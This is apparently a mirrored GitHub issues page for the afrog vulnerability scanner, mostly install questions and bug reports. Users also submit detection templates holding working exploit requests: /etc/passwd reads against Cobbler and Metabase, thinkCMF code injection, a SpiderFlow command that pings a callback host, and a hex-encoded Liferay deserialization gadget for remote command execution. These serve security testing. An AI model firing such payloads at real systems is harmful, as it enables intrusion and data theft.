zan8in / afrog Goto Github PK
View Code? Open in Web Editor NEWA Security Tool for Bug Bounty, Pentest and Red Teaming.
License: MIT License
afrog's Issues
师傅考不考虑加个代理参数
这工具怎么用的
进来看readme我都没弄明白怎么用的,afrog直接也不能用啊,是需要编译还是怎么
CNVD-2018-16876
漏洞详情
id: CNVD-2018-16876
info:
name: Cobbler任意文件读取漏洞
author: rain
severity: medium
description: |
Cobbler是一款网络安装服务器套件,它能够快速建立Linux网络安装环境。
Cobbler 2.6.11-1版本中存在任意文件读取漏洞。攻击者可利用该漏洞读取任意文件。
reference:
- https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-9605
rules:
r0:
request:
method: POST
path: /cobbler_api
headers:
Content-Type: text/xml
Accept-Encoding: gzip
body: |
<?xml version='1.0'?><methodCall><methodName>generate_script</methodName><params><param><value><string>windows10</string></value></param><param><value><string></string></value></param><param><value><string>/etc/passwd</string></value></param></params></methodCall>
expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
expression: r0()
本地测试通过
url扫描识别
url和接口进行爬取后 在进行漏洞扫描
不支持https?
thinkcmf文件包含
id: thinkcmf-file-include
info:
name: thinkCMF 文件包含
author: rain
severity: Critical
description: |
在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行
影响版本:
thinkCMFX 1.6.0-2.2.3
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
reference:
- https://www.thinkcmf.com/
rules:
r0:
request:
method: GET
path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf))
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body)
expression: r0()
复现
师傅这个扫描不走代理的嘛,在配置文件里设置burp代理,在burp中没有数据包诶
pocs update failed
-T批量检测报错
-T批量检测报错
Tip: Fingerprint has been disabled, the replacement tool is Pyxis (https://github.com/zan8in/pyxis)
SpiderFlow-save-rce
id: SpiderFlow-save-rce
info:
name: SpiderFlow save 远程命令执行漏洞
author: laohuan12138
severity: high
description: |
spiderflow 是一个爬虫平台,以图形化方式定义爬虫流程,无需代码即可实现一个爬虫,其中/function/save接口存在命令执行漏洞,可获取系统权限。
fofa: title=="SpiderFlow"
reference:
- https://cn-sec.com/archives/1366553.html
set:
reverse: newReverse()
reverseHost: reverse.url.host
rules:
r0:
request:
method: POST
path: /function/save
body: |
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping {{reverseHost}}');{
expression: reverse.wait(5)
expression: r0()
无法更新下载poc
虚假PoC 建议删除
CVE-2023-0297.yaml
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
Also, due to the lack of CSRF protection, a victim can be tricked to execute arbitrary python code
CSRF触发的RCE
师傅,这个可以直接使用nuclei的poc吗
CVE-2021-22145 检测规则不准确存在误报
https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/g-CVE/2021/CVE-2021-22145.yaml
参考https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/elasctic-memory-leak-cve-2021-22145.yaml
StatusCode() >= 400 && StringSearch("response", '"root_cause"') && StringSearch("resHeaders", "application/json") && StringSearch("response", 'truncated')
响应报文包含truncated时,才判断有漏洞。
afrog认为响应报文包含reason时存在漏洞。
实际扫描发现,afrog对reason的判断,似乎是不准确的,存在误报。
e-office-v10-sql-inject
id: e-office-v10-sql-inject
info:
name: 泛微 eoffice v10 前台 SQL 注入
author: 你是猪
severity: high
description: |
FOFA:fid="2csJpuWtfTdSAavIfJTuBw=="
进一步利用/验证方法,参考下面 reference 链接
reference:
- https://www.hedysx.com/2777.html
rules:
r0:
request:
method: GET
path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
expression: response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
expression: r0()
最新版afrog-config.yaml只有ceye,其他参数不见了
afrog的poc和nuclei的poc格式是否通用呢?
无法更新 ./afrog_linux --up
扫描结果空白
每次启动扫描都要将所有POC下载一遍,但是文件夹又是空的,还扫描不出来任何结果。每次扫描必须指定端口才可以扫描到结果吗?
json输出没反应
打扰了,刚看了代码,有漏洞的时候才输出json。
Install on Linux
Can you add to the readme how to install on linux?
sangfor-vpn-supersession-rce.yaml
获取rsa key咋利用?
一个小的Tips
单url速度很快,一批url速度就慢了,期待加入多线程
ceye.io挂了 反链平台失效
是否修改掉 用自用的 dnslog-go平台
afrog.exe -t http:xxxx像是报错想了解为啥会这样
Downloading the latest version of afrog-pocs...
panic: flate: corrupt input before offset 5
goroutine 1 [running]:
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile.func1()
github.com/zan8in/afrog/pkg/utils/unzip.go:58 +0x3c
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile({}, {0xc000526108, 0x12}, 0xc000542420)
github.com/zan8in/afrog/pkg/utils/unzip.go:90 +0x3a2
github.com/zan8in/afrog/pkg/utils.Unzip.Extract({}, {0xc00003b1a0?, 0xc000117901?}, {0xc000526108, 0x12})
github.com/zan8in/afrog/pkg/utils/unzip.go:40 +0x225
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Unzip(0xc00016a1e0, {0xc00003b1a0?, 0x101a768?})
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:133 +0x3d
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Download(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:121 +0x9f
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).UpgradePocs(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:103 +0x10f
github.com/zan8in/afrog/pkg/config.(*Options).verifyOptions(0xc0006041a0)
github.com/zan8in/afrog/pkg/config/options.go:229 +0x6f0
github.com/zan8in/afrog/pkg/config.NewOptions()
github.com/zan8in/afrog/pkg/config/options.go:174 +0x1405
main.main()
./main.go:26 +0x2e
会这样子报错
不能跟新
[root@1 1]# ./afrog_linux --updatepocs
PoC Update failed, failed to get remote version number
NAME:
afrog 漫天星辰 - v1.3.6
PATH:
/root/.config/afrog/afrog-config.yaml
v
./afrog -up更新问题
./afrog -up更新的时候报如下错误 ,请问下有问题没?
[ERR] ceye reverse service not set: /root/.config/afrog/afrog-config.yaml
| A F R O G > 2.3.1 - 0.1.99
[FTL] Could not create runner: target not found
Mac
Hello
can someone show me the steps to install this tool on a MacBook?
Thanks
咋把扫描指纹时的title删了呢?
这个可以保留
Which API Key and which Domain should we have to configure in afrog-config.yaml
Failed to start afrog,please edit api-key and domain in /root/.config/afrog/afrog-config.yaml
【BUG】在输出数据时 响应包缺失
如果response包过大 则不会保存完整响应包数据, html和json都一样
CVE-2020-7961
测试靶场:vulhub/liferay-portal/CVE-2020-7961
验证:
id: CVE-2020-7961
info:
name: Liferay Portal RCE 反序列化命令执行漏洞
author: leo
severity: high
verified: true
description: |
Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。
FOFA:app="Liferay"
reference:
- https://www.anquanke.com/post/id/240042
set:
randstr: randomLowercase(15)
rules:
r0:
request:
method: POST
path: /api/jsonws/invoke
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
command: echo {{randstr}}
body: |
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=pZryCOb2&formDate=1679026956587&tableId=1&name=1&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E0020000787000000BCECAFEBABE0000003200900A0003002207008E07002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E010043636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F6163636573732F636F6E74726F6C2F416363657373436F6E74726F6C5574696C07002A010017676574416363657373436F6E74726F6C436F6E7465787401004028294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E746578743B0C002C002D0A002B002E01003C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E7465787407003001000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0C003200330A0031003401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0C003600370A00310038010007636F6D6D616E6408003A0100256A617661782F736572766C65742F687474702F48747470536572766C65745265717565737407003C010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C003E003F0B003D00400100076F732E6E616D650800420100106A6176612F6C616E672F53797374656D07004401000B67657450726F70657274790C0046003F0A004500470100106A6176612F6C616E672F537472696E6707004901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B0C004B004C0A004A004D01000377696E08004F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C005100520A004A0053010007636D642E6578650800550100022F63080057010004626173680800590100022D6308005B0100116A6176612F6C616E672F52756E74696D6507005D01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C005F00600A005E006101000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C006300640A005E00650100116A6176612F6C616E672F50726F6365737307006701000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C0069006A0A0068006B0100116A6176612F7574696C2F5363616E6E657207006D010018284C6A6176612F696F2F496E70757453747265616D3B29560C000A006F0A006E00700100025C6108007201000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C007400750A006E00760100076861734E65787401000328295A0C007800790A006E007A0100046E6578740C007C004C0A006E007D01000008007F0100106C6966657261795263654465746563740800810100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E7365070083010009736574486561646572010027284C6A6176612F6C616E672F537472696E673B4C6A6176612F6C616E672F537472696E673B29560C008500860B008400870100135B4C6A6176612F6C616E672F537472696E673B0700890100136A6176612F696F2F496E70757453747265616D07008B01000D537461636B4D61705461626C6501001E79736F73657269616C2F50776E65723130323233313931343032353530300100204C79736F73657269616C2F50776E65723130323233313931343032353530303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F008F00000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F008F000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F008F00000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C000000D50005000A0000009AA70003014CB8002FB600354DB8002FB600394E2D123BB9004102003A041243B80048B6004E1250B600543605150599001B06BD004A5903125653590412585359051904533A06A7001806BD004A5903125A535904125C5359051904533A06B800621906B60066B6006C3A07BB006E591907B700711273B600773A081908B6007B99000B1908B6007EA7000512803A092C12821909B900880300B100000001008D00000029000503FF00450006000507008407003D07004A010000FC001407008AFD002C07008C07006E4107004A0002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78%3B%22%7D
expression: response.raw_header.bcontains(bytes(randstr))
expression: r0()I can not run it
Hi,
i setup it using git clone then iam trying to run it but i do not know why or what should i do next.
Any help about the next steps to run it ?
json输出内容添加
目前json输出三个字段{"name":"xxx","severity":"xx","url":"http://xxx"} ,可以使用的场景比较少,可以考虑添加,请求包,响应包、poc文件里面的info字段的所有内容和id等等,就通过指定参数的形式添加输出内容,就好像nuclei的一样,个人比较喜欢用afrog
csz-cms-multiple-blind-sql-injection存在误报
关于一个小小的编码问题
我在编写如下poc 验证时发现一个问题,返回包的编码问题可能会影响类似这种匹配规则 response.body.bcontains(b'\x7e\x70\x05\x53\x6e')
编写的poc内容如下:
id: e-cology-weaver-v9-dbconfigreader-info-leak
info:
name: 泛微OA e-cology V9前台数据库帐号密码信息泄漏漏洞
author: secse(https://github.com/forktopot)
severity: high
description: 泛微OA ecology v9数据库帐号密码信息泄漏漏洞 app="Weaver-OA"
reference:
- https://github.com/jas502n/DBconfigReader
rules:
r0:
request:
method: GETF
path: /mobile/DBconfigReader.jsp
follow_redirects: false
expression: response.status == 200 && (response.body.bcontains(b'\x7e\x70\x05\x53\x6e') || response.body.bcontains(b'\x7e\x70\x05\x40\x73'))
expression: r0()
该poc我在xray 上使用是完全没有问题然后改过来的
一开始无法验证,然后我把 pkg/protocols/http/retryhttpclient/client.go p179 行修改后便可以验证了
CVE-2021-41277
漏洞详情
id: CVE-2021-41277
info:
name: Metabase 输入验证错误漏洞
author: rain
severity: high
description: |
在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
reference:
- GHSA-w73v-6p7p-fpfr
rules:
r0:
request:
method: GET
path: /api/geojson?url=file:///etc/passwd
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
r1:
request:
method: GET
path: /api/geojson?url=file:///etc/resolv.conf
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
expression: response.status == 200 && "namespace".bmatches(response.body)
expression: r0() || r1()
测试结果:
install
just an inquiry on how to install considering no documentation is provided
go build main.go之后就报错
pkg/runner/cel.go:15:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/genproto/@v/v0.0.0-20210831024726-fe130286e0e2.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:10:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:11:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/poc/poc.go:9:2: gopkg.in/[email protected]: Get "https://proxy.golang.org/gopkg.in/yaml.v2/@v/v2.4.0.zip": dial tcp 172.217.163.49:443: i/o timeout
就主要报这个错,师傅我该怎么解决呀,用代理也不行
CVE-2021-31805
CVE-2021-31805 POC根本跑不出来噢~
师傅这个能挂到vps上扫吗
源码修改后的window下和linux下不一致
在源码中添加自定义请求头,编译运行后使用zeek捕捉http请求,发现afrog.exe运行后可以抓到自定义头,在linux下执行没有找到
3.0 rce确定存在?
师傅,本地搭的3.0环境没有成功复现呢
自定义afrog-pocs路径
默认情况下,afrog-pocs的路径是固定的。
windows下:C:\Users\Administrator\afrog-pocs
linux下:/home/ubuntu/afrog-pocs
建议模仿nuclei,增加-td参数,指定afrog-pocs的默认路径。
师傅是这样用的吗?为什么会报错
─$ /home/kali/Desktop/afrog_linux_amd64 -T /home/kali/Desktop/vulmap-0.9/list.txt -o afrog_result1.html 2 ⨯
一个挖洞工具 A tool for finding vulnerabilities - V1.2.7
Default Conf /home/kali/.config/afrog/afrog-config.yaml
Default Pocs /home/kali/afrog-pocs v0.1.0
Output Report afrog_result1.html
2/926 | 0% panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0xa57b41]
goroutine 55 [running]:
github.com/zan8in/afrog/pkg/core.(*Engine).ReleaseChecker(0xc0003480f0, 0xc0003418c0)
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/engine.go:32 +0x21
github.com/zan8in/afrog/pkg/core.(*Engine).executeExpression(, {, }, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:74 +0x1b2
github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets.func2({, _}, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, {0x0, ...}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:62 +0xc5
created by github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:59 +0x392
批量检测存活后不扫描了
hi
How to install in Kali Linux
启动 afrog 出错,rerverse CeyeApiKey or CeyeDomain is Empty in your /home/[yourname]/.config/afrog/afrog-config.yaml
thx
yunshikong-ERP-SQL-injection
id: yunshikong-ERP-SQL-injection
info:
name: yunshikong-ERP-SQL-injection
author: laohuan12138
severity: high
description: |
云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
FOFA: title="云时空社会化商业ERP"
reference:
- https://wiki.peiqi.tech/wiki/webapp/云时空ERP/云时空%20社会化商业ERP系统%20validateLoginName%20SQL注入漏洞.html
rules:
r0:
request:
method: GET
path: /sys/user/validateLoginName?loginName=admin'
expression: response.status == 500 && response.body.bcontains(b"SQLException")
expression: r0()
afrog-config.yaml中的代理参数无法生效
使用ssr-command-client挂上shadowsocksr代理,无法成功走代理。地址:https://github.com/TyrantLucifer/ssr-command-client/
配置方式:
hattp://127.0.0.1:1080
socks://127.0.0.1:1080
socks5://127.0.0.1:1080
三种方式都不太行
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.